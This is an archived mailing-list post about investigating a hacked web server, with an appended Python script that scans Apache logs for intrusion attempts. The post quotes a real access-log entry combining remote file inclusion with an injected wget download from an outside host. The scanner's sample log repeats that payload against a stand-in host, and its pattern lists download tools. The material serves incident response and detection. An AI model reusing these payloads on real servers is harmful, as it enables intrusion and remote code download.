
BLU Discuss list archive



My website was hacked! (fwd)



David Kramer wrote:

>Anything else I should try?
>
>Should I panic more than I am?  Right now I feel strongly this was a 
>benign "stupid Apache tricks" thing, and I need to find the hole and close 
>it, but no need to nuke the server and start over.
To add to my off-list comments...

I'm a little hazy on the details as this was a while ago, but here's 
what we found after the hacker had exploited a _known_ gaping hole in a 
php app one of our users was running:
* They had dropped a false shell into /var/tmp that ran under the apache 
user -- I think it listened on some funny port - and we discovered it 
when we went to bounce apache and got some weird message
* They tried to compile an irc bot (go figure)
* Apache logs had the evidence:
Several instances of this:
./log/access_log:203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

Nasty.

I ran chkrootkit and it didn't find anything.  I also did checksums 
against a lot of local binaries compared to known good ones to make sure 
they were the originals.
 
I bet you are right that it's an apache-only thing, but I would be 
_really_ sure.  I would also leave apache (and perhaps other daemons as 
well) down until you are sure you found the problem.  Our offender came 
back once or twice more unsuccessfully.
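A defender-side scan for access-log entries of the kind quoted above, added here as an example and not part of the original post: it flags query parameters that carry a remote URL (the remote-file-inclusion half) or shell separators and download helpers (the command-injection half). The sample log lines are constructed (RFC 5737 addresses, attacker.example) and the parameter names are assumptions modelled on the post's entry.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache "combined" log format; only the fields the scan needs are named.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$')
# Shell separators and download helpers that have no business inside a query parameter.
SHELL_RE = re.compile(r'(;|\|\||&&|`|\$\()|\b(wget|curl|chmod)\b')

def split_query(query):
    """Split a raw query string on '&' only (never on ';', which here is payload),
    percent-decoding names and values so encoded payloads are inspected in the clear."""
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def analyze_line(line):
    """Return findings (dicts) for one log line: remote URLs passed as parameter
    values (remote file inclusion) and shell command fragments in parameter values."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    findings = []
    for name, value in split_query(urlsplit(m['target']).query):
        if re.match(r'(https?|ftp)://', value, re.I):
            findings.append(dict(host=m['host'], time=m['time'],
                                 reason='remote-url-in-param', param=name, value=value))
        if SHELL_RE.search(value):
            findings.append(dict(host=m['host'], time=m['time'],
                                 reason='shell-metachars-in-param', param=name, value=value))
    return findings

def scan(lines):
    """Run analyze_line over an iterable of log lines and collect every finding."""
    return [f for line in lines for f in analyze_line(line)]

# Constructed sample log: the first entry mirrors the shape of the entry quoted in the
# post (hostile values replaced with attacker.example); the other two are ordinary traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Jan/2004:19:29:10 -0800] "GET /pm_inc.php?pm_path=http://attacker.example/_borders/&cmd=cd%20/var/tmp%20;%20wget%20attacker.example/tools/mx HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
192.0.2.5 - - [12/Jan/2004:19:31:02 -0800] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Jan/2004:19:33:45 -0800] "GET /search.php?q=linux+shell+scripting HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['host']} {f['time']} {f['reason']}: {f['param']}={f['value']!r}")
```

Pipe a real access_log through scan() to get a short list of source addresses and decoded parameter values to check against the application's expected inputs; the pattern list is a heuristic, so review hits rather than acting on them blindly.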